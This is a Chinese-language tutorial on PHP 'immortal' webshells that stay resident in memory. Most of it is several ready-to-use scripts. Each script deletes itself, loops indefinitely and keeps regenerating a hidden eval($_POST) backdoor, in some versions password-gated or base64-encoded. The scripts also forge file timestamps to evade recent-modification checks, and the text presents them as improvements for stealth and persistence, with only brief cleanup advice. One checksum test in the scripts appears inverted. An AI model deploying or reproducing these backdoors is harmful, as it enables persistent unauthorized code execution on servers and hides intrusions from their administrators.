什么是不死马
内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。
流程大概为:
不死马.php
–>上传到服务器
–>服务器执行
–>在服务器上循环生成
用以上流程达到不死的效果
可用的php函数
1.ignore_user_abort(true); -->函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行。
2.set_time_limit() -->函数设置脚本最大执行时间。这里设置为0,即没有时间方面的限制。
3.unlink(__FILE__) -->删除文件本身,以起到隐蔽自身的作用。
4.system() -->执行的命令用于修改文件的创建或修改时间,可以绕过“find –name '*.php' –mmin -10”命令检测最近10分钟修改或新创建的PHP文件,但不一定有用,可选。
来个简单的例子
<?php
ignore_user_abort(true); //函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行。
set_time_limit(0); //函数设置脚本最大执行时间。这里设置为0,即没有时间方面的限制。
unlink(__FILE__); //删除文件本身,以起到隐蔽自身的作用。
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
file_put_contents($file,$code); //将一个字符串写入文件
system('touch -m -d "2021-09-07 09:10:12" .2.php');
usleep(5000);
}
?>
具体的思路就是,就是让客户机断开的时候,不死马也是可以运行
然后不断的生成新的后门文件
把自己删除,达到隐藏的目的
.
为前缀的文件,还可以隐藏后门文件本身
我们来试一下
测试环境为 kali 虚拟机
在实验环境下创建马来模拟真是环境
查看一下进程
这是实验开始前的进程
然后给予shell.php
文件的权限 然后运行一下
可以看到 原生成文件已经自我删除
查看进程
已经写入到内存
我们尝试删除生成的shell文件
会迅速再生
而且打开文件会提示一直在修改
此时解决办法:
1、查看进程然后kill掉进程最后删除木马
2、重启然后删除木马
成功清楚木马文件
当然这只是最简单的木马文件
下面我们来改进一下
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .2.php');
usleep(5000);
}
?>
如果我们将
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
注释掉就可以绕过这个shell
所以我们可以采用将shellbase64
加密
同时进行md5校验
这样更加安全
<?php
ignore_user_abort(true);
set_time_limit(0);
$file = 'c.php';
$code = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+');
while(true) {
if(md5(file_get_contents($file))===md5($code)) {
file_put_contents($file, $code);
}
usleep(50);
}
?>
emmm 貌似php不死马 目前我只能写这么多了
但是有个弊端
被攻击者更换目录,或者把目录移走
木马就会失效,所以我们可以遍历文件夹每个都写
随便激活一个即可
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
sleep(1);
if(file_exists('index.php')){
if(md5_file('{name}')==='912d7b3bbd5cf7405c9cc8f16156321b'){
}else{
file_put_contents('{name}',base64_decode('PD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtoM10pKTs/Pg=='));
}
}else{
if(file_exists('{name}')){
unlink('{name}');
}
}
}
?>